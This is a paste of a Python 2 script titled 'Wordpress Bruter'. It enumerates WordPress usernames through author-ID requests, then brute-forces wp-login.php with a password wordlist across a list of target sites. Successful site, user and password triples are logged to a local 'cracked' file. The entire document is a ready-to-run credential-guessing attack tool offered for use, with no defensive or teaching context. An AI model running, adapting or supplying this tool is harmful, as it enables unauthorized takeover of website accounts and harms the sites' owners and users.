SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/python | |
| 2 | ||
| 3 | # >>>>>>>>> bismallah <<<<<<<<<< | |
| 4 | # Coded by MatriX Coder | matrix.coder1@gmail.com | |
| 5 | # You are free to edit my code and to remove my rights :D | |
| 6 | # Greetz to fallega team | www.dev-tun.tn | |
| 7 | ||
| 8 | ''' | |
| 9 | this a wordpress bruter | |
| 10 | the special thing about it that it | |
| 11 | grabs user and brute force it | |
| 12 | ''' | |
| 13 | ||
| 14 | # v1.0 first release | |
| 15 | ||
| 16 | import sys , re , urllib2 , urllib , cookielib , os | |
| 17 | from platform import system | |
| 18 | ||
| 19 | if system() == 'Linux': | |
| 20 | os.system('clear')
| |
| 21 | if system() == 'Windows': | |
| 22 | os.system('cls')
| |
| 23 | ||
| 24 | logo = ''' | |
| 25 | ||
| 26 | _ ______ __ __ | |
| 27 | | | / / __ \/ /_ _______ __/ /____ | ----| Wordpress Bruter |---- | |
| 28 | | | /| / / /_/ / __ \/ ___/ / / / __/ _ \ | Author : MatriX Coder | |
| 29 | | |/ |/ / ____/ /_/ / / / /_/ / /_/ __/ | FB : www.fb.com/matrixcoder2 | |
| 30 | |__/|__/_/ /_.___/_/ \__,_/\__/\___/ | Blog : www.matrixcoder.co.vu | |
| 31 | ||
| 32 | ||
| 33 | ''' | |
| 34 | ||
| 35 | print(logo) | |
| 36 | ||
| 37 | # this function is to enumerate user | |
| 38 | def user(site , passlist): | |
| 39 | userlist = list() | |
| 40 | i = 1 | |
| 41 | # you can edit to whatever number of users you want to enumerate | |
| 42 | while( i <= 5 ) : | |
| 43 | url = site + '?author=%i' % i | |
| 44 | try: | |
| 45 | data = urllib2.urlopen(url).read() | |
| 46 | # cleaning the sh*t | |
| 47 | re1 = re.findall("<title>(.*?)</title>" , data)
| |
| 48 | user = re.search("(.*?) |" , re1[0]).group(1)
| |
| 49 | userlist.append(user) | |
| 50 | except: | |
| 51 | pass | |
| 52 | i += 1 | |
| 53 | wpbrute(site , userlist, passlist) | |
| 54 | return site | |
| 55 | ||
| 56 | ||
| 57 | def wpbrute(site , userlist , passlist): | |
| 58 | for user in userlist: | |
| 59 | # if enumeration returns no user | |
| 60 | if user == "" : | |
| 61 | userlist[0] = "admin" | |
| 62 | del userlist[1:] | |
| 63 | ||
| 64 | for user in userlist : | |
| 65 | for password in passlist: | |
| 66 | try: | |
| 67 | print str(site) + ':' + user + ':' + password | |
| 68 | # found the answer on stackoverflow | |
| 69 | cj = cookielib.CookieJar() | |
| 70 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) | |
| 71 | login_data = urllib.urlencode({'log' : user, 'pwd' : password})
| |
| 72 | opener.open(str(site) + 'wp-login.php', login_data) | |
| 73 | resp = opener.open(str(site)+'wp-admin') | |
| 74 | final = resp.read() | |
| 75 | if '<li id="wp-admin-bar-logout">' in final: | |
| 76 | print "\n\t[*] Cracked : " + str(site) + ':' + user + ':' + password + '\n' | |
| 77 | with open('wpcracked.txt' , 'a') as myfile:
| |
| 78 | myfile.write('~~ Cracked ~~ ' + str(site) + ':' + user + ':' + password + '\n')
| |
| 79 | break | |
| 80 | ||
| 81 | except: | |
| 82 | pass | |
| 83 | ||
| 84 | try: | |
| 85 | siteslist = list() | |
| 86 | passlist = list() | |
| 87 | wpfile = sys.argv[1] | |
| 88 | wordlist = sys.argv[2] | |
| 89 | # opening sites file | |
| 90 | sites = open(wpfile).readlines() | |
| 91 | # opening password files | |
| 92 | passes = open(wordlist).readlines() | |
| 93 | # passes to list | |
| 94 | for pass1 in passes: | |
| 95 | pass1 = pass1.rstrip() | |
| 96 | passlist.append(pass1) | |
| 97 | # sites to list | |
| 98 | for site in sites: | |
| 99 | site = site.rstrip() | |
| 100 | if 'http://' not in site: | |
| 101 | site = 'http://' + site | |
| 102 | if '/' != site[-1]: | |
| 103 | site = site + '/' | |
| 104 | ||
| 105 | user(site , passlist) | |
| 106 | ||
| 107 | ||
| 108 | except IndexError: | |
| 109 | print "[*] Usage : python "+sys.argv[0]+" wp.txt wordlist.txt" |
